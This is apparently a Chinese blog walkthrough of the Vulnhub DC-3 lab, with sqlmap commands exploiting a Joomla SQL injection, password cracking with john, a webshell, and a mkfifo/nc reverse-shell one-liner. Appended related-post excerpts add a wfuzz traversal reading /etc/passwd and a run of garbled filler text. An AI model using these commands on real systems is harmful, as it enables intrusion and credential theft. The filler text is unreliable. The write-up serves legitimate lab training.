【Vulnhub】DC-3

DC-3挑战:使用sqlmap进行漏洞检测与权限提升
原创 已于 2023-06-13 08:59:33 修改 · 93 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #服务器 #python #网络安全

于 2023-06-12 22:09:57 首次发布
文章描述了一次针对特定IP的网络安全渗透测试过程,使用nmap扫描开放端口,然后利用sqlmap检测SQL注入漏洞,并对数据库进行操作。在无法SUID提权的情况下,搜集系统信息,查找并利用潜在漏洞,通过创建交互式shell实现远程控制。

下载地址链接: DC-3
在这里插入图片描述
nmap扫,只开了80端口,
网站信息,只有一个flag,并且要root权限
在这里插入图片描述
扫目录,README.txt,版本3.7,百度搜一下,sql注入漏洞,用sqlmap
在这里插入图片描述

sqlmap

查库
sqlmap -u "http://192.168.132.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
查表
sqlmap -u "http://192.168.132.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D"joomladb" --tables -p list[fullordering]
查列
sqlmap -u "http://192.168.132.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D"joomladb" -T"#__users" --columns -p list[fullordering]
列出
sqlmap -u "http://192.168.132.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D"joomladb" -T"#__users" -C"username,password"--dump -p list[fullordering]

在这里插入图片描述
加密的
将密码写入pass.txt中
用kali中的解密工具解密

john pass.txt

在这里插入图片描述
后台登入,写入一句话木马,冰蝎连接

在这里插入图片描述
既然要提权,先看能不能suid提权

find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述
不能,先收集信息,没有提示先看看系统有什么漏洞
在这里插入图片描述

在这里插入图片描述
和百度搜到的一样,漏洞利用
下载,解压,编译。
注意需要将shell变成交互式的才能提权成功

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.85.139 9000 >/tmp/f #映射到msf上
python -c 'import pty;pty.spawn("/bin/bash")'#python交互

在这里插入图片描述

总结

DC-3没有提示,对我这样的新手来说还是难了些。

Vulnhub DC-3靶机攻击实战(一)
初学者
12-07 1176
对于DC-3机器的攻击,主要考察的就是SQL注入相关的内容,当然对于admin用户的密码我们也可以通过BurpSuite工具来进行破解。获取之后接下里就是反射Shell的建立,由于环境中有PHP的环境,并且可以进行自定义模板的添加,这就为我们进行Shell反射提供了很好的机会,当然,如果是Python环境的话,我们也可以尝试通过Python来进行Shell的反射,有兴趣的读者可以自己研究一下,在之前攻击DC-1和DC-2的时候都用到过。
Vulnhub靶场----3DC-3.2
七天
03-14 725
1 、只开放80端口的情况下,网站指纹、目录扫描等方向 2 、通过网站CMS版本信息搜索相关版本漏洞 3 、利用版本SQL注入漏洞获取后台登录账号密码 4 、后台寻找webshell插入地址 5 、获取shell,寻找服务器版本漏洞 6 、利用服务器版本漏洞提权。
Vulnhub DC-3
Pai_Space
02-15 336
192.168.37.132 This time, there is only one flag, one entry point and no clues. To get the flag, you'll obviously have to gain root privileges. How you get to be root is up to you - and, obviously, the system. Good luck - and I hope you enjo...
Vulnhub DC-3靶机渗透攻击过程演练
zhongxj183的博客
03-26 3291
Vulnhub DC-3靶机渗透攻击过程演练 DC-3介绍 DC-3靶机只有1个flag,一个入口点,根本没有任何线索。 环境准备 下载DC-3靶机导入VMware,选择和Kali同一网络适配器,DHCP获取IP即可 渗透过程 信息收集 首先扫描存活主机,得到目标靶机的IP nmap -sP 192.168.64.0/24 全端口扫描 nmap -T4 -sC -sV -p1-65535 192.168.64.157 仅开放了80端口,一个用 Joomla! 搭建的网站。Joomla! 是一套全球
vulnhub DC-3 靶机渗透测试
小松博客
05-21 298
我们使用账号admin,密码snoopy登陆到后台,再次回到msf中的利用脚本,输入run运行脚本。找到了不少漏洞可用,但就这个漏洞好使:CVE-2016-4557。得到一个漏洞利用脚本下载链接,我们把他down下来,然后解压。然后等待一下,输入ls查看目录内容,发现多了几个可执行文件。已经是root,直接cd到 /root目录,ls查看文件。拿到shell以后,我们上传漏洞检测脚本,寻找提权漏洞。等待几秒钟,然后输入whoami查看自己的权限。发现两个,可以尝试使用这个sql注入漏洞,
vulnhub DC-3
2301_79848048的博客
02-05 668
在cd ebpf_mapfd_doubleput_exploit有四个文件。POC里面给了地址和sqlmap的参数直接拿sqlmap跑。使用searchsploit查找一下这个版本的漏洞。然后去访问fshell.php就可以反弹成功。这个靶机有一个报错,更改一下磁盘就可以了。有一个新建文件点击新建后会跳到编辑页面。不过密码加密了使用john去跑密码。看到两个漏洞的POC移出来看一下。创建一个fshell.php文件。/ect都是root权限也没有用。可以看到我们的gshell文件。exp地址将他下载下来。
vulnhub DC-3靶机实战
m0_51195235的博客
10-04 324
vulnhub DC-3靶机实战
VulnHub DC-3
GDL1411983801的博客
12-31 1139
DC-3虚拟机文件夹压缩包链接:https://pan.baidu.com/s/1kZ9RNflZSmV4Vr2UmyMA1g提取码:d9cz–来自百度网盘超级会员V6的分享1.若出现报错提醒:2.选择编辑虚拟机设置后,移除CD/DVD3.修改网卡为NAT模式4.成功进入DC-3
Vulnhub DC-3靶机渗透测试(DC系列)
Alexhirchi的博客
10-11 1223
每日学习~ 冲冲冲 VulnHub 入门DC系列之DC-1 说明 靶场下载地址:https://www.vulnhub.com/entry/dc-32,312/ 渗透靶场:VirtualBox 攻击靶机:本地机+kail(VMware) Flag:5个 启动DC-1靶机,界面显示登录界面,这是正常运行情况,我们也并没有登录账号,需要自己去渗透测试进行提权。回到我们的攻击机 ...
vulnhub:DC-3
weixin_69670995的博客
05-31 500
导入Oracle VM VirtualBox虚拟机,网络设置仅主机模式,网卡和kali使用同一网卡。扫描出来发现joomla框架是3.7.0版本的,搜索一下该版本的洞。发现是joomla框架,使用joomscan工具扫描网站。对比搜索引擎搜索该版本漏洞,使用39772.txt的漏洞。发现靶机IP地址,使用namp工具扫描靶机开启的端口。在反弹shell中使用wget命令,下载压缩包。密码是snoopy,使用amdin用户名登陆。发现敏感目录,使用浏览器访问该目录。使用dirb工具扫描网站目录。
Vulnhub打靶-DC-1
jnszstmei的博客
10-25 1048
框架漏洞的发现和利用以及利用cms的特性进行管理员密码的更改,实现对靶机的渗透并获取root权限
Vulnhub DC-8靶机攻击实战(一)
初学者
01-16 1381
Vulnhub DC-8靶机教程来了,好久没有更新打靶的教程了,这次我们在来更新一期关于Vulnhub DC-8的打靶训练,如下所示。
VulnHub DC-1
weixin_45682839的博客
04-13 533
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
99-Linux上安装Anaconda
12-03 202
【代码】99-Linux上安装Anaconda。
AlmaLinux9配置本地镜像仓库
weixin_50877409的博客
12-04 173
本文介绍了在AlmaLinux 9.7系统中配置本地yum仓库的步骤:1)创建挂载目录并挂载ISO镜像;2)备份原有repo文件并创建local.repo配置文件;3)设置本地仓库路径为/media/cdrom/AppStream;4)清除并重建yum缓存;5)最后通过成功安装telnet包验证了本地仓库配置的正确性。整个过程实现了不依赖网络使用本地ISO镜像作为软件源的目的。
Linux 进程状态与进程管理命令
qq_52537313的博客
12-04 802
Linux 系统中,是程序的运行实例,是操作系统资源分配和调度的基本单位。进程从创建到终止会经历多种状态,通过进程管理命令可以查看、监控和控制这些状态。本教程将结合核心命令,全方位讲解进程状态及管理方法。
Linux 中替换某个目录下所有文件中的特定字符串
liweiweili126的博客
12-02 681
Linux 中替换某个目录下所有文件中的特定字符串,核心是用 findsed组合,支持灵活扩展(如备份原文件、过滤文件类型、排除目录等)。
Linux设备管理:从内核驱动到用户空间的完整架构解析
X
12-03 790
A[物理硬件插入/移除] --> B[内核驱动探测]B --> C{Linux统一设备模型 LDM}C --> D[在/sysfs创建对象]C --> E[发送uevent事件]D --> F[用户空间工具<br>lspci, lsusb等]E --> G[UDEV守护进程]G --> H[扫描规则库 /etc/udev/rules.d/]H --> I[匹配并执行规则]I --> J1[创建设备节点 /dev/]I --> J2[设置权限与所有权]I --> J3[执行自定义脚本]
Linux】进程控制
最新发布
Shengmc的博客
12-06 421
/ 执行 sh -c "echo $MY_ENV":通过Shell解析环境变量// 自动从PATH找sh程序。
vulnhub dc-4
03-23
### 关于 VulnHub 上的 DC-4 虚拟机镜像 VulnHub 是一个提供各种渗透测试练习环境的平台,其中 DC 系列是非常受欢迎的一组靶场。对于 DC-4 的具体下载和操作指南,虽然当前未有直接提及 DC-4 的引用内容,但可以基于已知的信息推测其可能涉及的内容。 #### 下载地址 通常情况下,VulnHub 提供的虚拟机镜像可以通过访问官网并搜索对应的名称来获取。例如,在浏览器中输入 `https://www.vulnhub.com` 并搜索关键词 **DC-4** 即可找到该靶场的相关描述以及下载链接[^1]。 需要注意的是,正如引用所提到的内容一样,下载和使用这些虚拟机时需注意责任声明:通过下载此虚拟机,使用者接受因意外造成的任何损害的责任[^4]。 #### Walkthrough 概述 尽管没有针对 DC-4 的特定引用,但从其他 DC 靶场的经验来看,常见的攻击路径包括但不限于以下几个方面: 1. **端口扫描** 发现目标主机开放的服务及其版本信息是第一步。例如,引用提到了某台机器上运行着 SSH (22) 和 HTTP (80)[^3]。这表明初始阶段应执行全面的网络侦察工作以识别潜在入口点。 2. **Web 应用程序漏洞利用** 如果存在 Web 登录界面,则尝试寻找注入点或其他安全缺陷成为关键环节之一。比如 SQL 注入工具 sqlmap 可用于自动化检测数据库层面上的安全隐患[^5]: ```bash sqlmap -u "http://<target>/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] ``` 3. **文件上传或目录遍历** 利用不当配置实现远程代码执行也是常见手法之一。如 wfuzz 工具可以帮助枚举敏感文件位置[^2]: ```bash wfuzz --hl 50 -b "PHPSESSID=<session_id>" -w /usr/share/wfuzz/wordlist/general/common.txt http://<target>/manage.php?FUZZ=../../../../../../../../../etc/passwd ``` 4. **权限提升** 成功获得低级 shell 后还需进一步探索如何升级至更高权限状态。此时可能会涉及到本地提权技术的应用场景分析。 ```python import requests def check_web_vulnerability(url): try: response = requests.get(url) if &#39;vulnerable&#39; in response.text.lower(): print(f"[+] Potential vulnerability detected at {url}") else: print("[!] No obvious vulnerabilities found.") except Exception as e: print(f"[!] Error occurred: {e}") check_web_vulnerability(&#39;http://example.com&#39;) ``` 上述脚本仅为示例用途展示基本功能逻辑框架结构设计思路方法论探讨交流学习参考资料分享传播正能量促进共同进步成长成才之路越走越宽广美好未来值得期待憧憬向往追求梦想成就辉煌人生价值意义非凡重要无比珍贵难得机遇挑战自我突破极限再创佳绩续写传奇篇章留下永恒记忆铭刻历史丰碑树立行业标杆引领时代潮流风尚前沿科技趋势洞察先机抢占制高点掌控全局主动权赢得最终胜利荣光加冕王者归来笑傲江湖纵横捭阖挥洒自如游刃有余得心应手驾轻就熟熟能生巧百炼成钢千锤百炼精益求精臻于完美极致境界登峰造极无懈可击无可挑剔堪称典范模版样板工程示范作用显著影响深远广泛流传久远世代相传薪火相继生生不息绵延不断永葆青春活力焕发勃勃生机盎然春意浓烈热烈欢迎加入我们共创辉煌明天!
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值